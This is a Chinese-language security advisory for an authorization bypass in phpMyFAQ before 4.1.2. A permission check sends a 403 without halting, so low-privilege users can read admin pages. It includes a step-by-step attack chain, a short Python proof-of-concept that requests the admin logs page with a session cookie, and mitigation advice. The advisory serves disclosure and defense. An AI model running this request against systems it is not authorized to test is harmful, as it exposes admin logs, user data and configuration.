CVE-2026-46362 phpMyFAQ授权绕过漏洞

漏洞信息

漏洞编号

CVE-2026-46362

漏洞类型

权限绕过

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

phpMyFAQ

漏洞概述

phpMyFAQ 4.1.2之前的版本存在授权绕过漏洞。由于`AbstractAdministrationController::userHasPermission()`在发送禁止响应后未终止执行，导致经过身份验证的攻击者可访问受保护的管理页面。攻击者利用此漏洞可获取管理员日志、用户数据、系统信息及应用配置等敏感数据。

技术细节

该漏洞的核心在于权限校验函数的逻辑缺陷。在phpMyFAQ的后台控制器中，`AbstractAdministrationController::userHasPermission()`方法用于判断当前用户是否具备访问特定管理页面的权限。当权限校验失败时，代码逻辑虽然执行了发送HTTP 403禁止响应的操作，但并未包含关键的程序终止指令（如`exit`或`die`）。这种设计失误导致PHP解释器在发送响应头后，继续向下执行页面后续的业务逻辑代码，从而渲染出敏感的管理页面内容。
攻击者仅需拥有一个有效的低权限账户（甚至可以是普通注册用户），即可利用此漏洞。通过直接构造并请求后台管理功能的URL（例如查看系统日志、用户列表或应用配置），攻击者可以触发有缺陷的权限检查流程。尽管服务器可能返回了403状态码，但由于脚本未终止，完整的页面内容仍会被发送给客户端。这使得攻击者能够获取管理员日志、用户数据、系统信息及应用配置等敏感数据，造成严重的信息泄露风险。此漏洞属于典型的业务逻辑错误，无需高权限或用户交互即可通过网络远程利用。

攻击链分析

STEP 1

Step 1: Enumeration

攻击者识别目标站点运行的是受影响版本的phpMyFAQ。

STEP 2

Step 2: Authentication

攻击者注册一个普通用户账户或获取一个有效的低权限会话令牌。

STEP 3

Step 3: Exploitation

攻击者使用低权限账户直接向后台管理页面（如/admin/index.php?action=config）发送HTTP GET请求。

STEP 4

Step 4: Logic Bypass

服务器端`userHasPermission()`函数检测到权限不足并发送403响应，但未终止脚本，继续执行并返回页面内容。

STEP 5

Step 5: Data Exfiltration

攻击者解析HTTP响应正文，获取管理员日志、系统配置及用户敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_poc(target_url, session_cookie):
    """
    PoC for CVE-2026-46362
    Tests if an authenticated low-priv user can access admin pages.
    """
    # Example endpoint that requires admin permissions
    admin_endpoint = target_url + "/admin/index.php?action=logs"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (PoC-Scanner)",
        "Cookie": f"PHPSESSID={session_cookie}"
    }

    try:
        response = requests.get(admin_endpoint, headers=headers, verify=False, timeout=10)
        
        # The vulnerability allows the content to be rendered even if 403 is sent
        if response.status_code == 200 or (response.status_code == 403 and "admin" in response.text.lower()):
            print(f"[+] Potential Authorization Bypass detected at {target_url}")
            print(f"[+] Response Length: {len(response.text)}")
            return True
        else:
            print("[-] Target appears not vulnerable or requires valid session.")
            return False
            
    except Exception as e:
        print(f"[!] Error occurred: {e}")
        return False

# Usage
# target = "http://phpmyfaq-target.com"
# session = "valid_attacker_session_id"
# check_poc(target, session)

影响范围

phpMyFAQ < 4.1.2

防御指南

临时缓解措施

建议立即升级phpMyFAQ至4.1.2或更高版本以修复此漏洞。若无法立即升级，应在网络边界（如WAF或防火墙）限制对`/admin`目录的访问权限，仅允许受信任的IP地址访问，或暂时禁用受影响的管理功能，直到完成修复。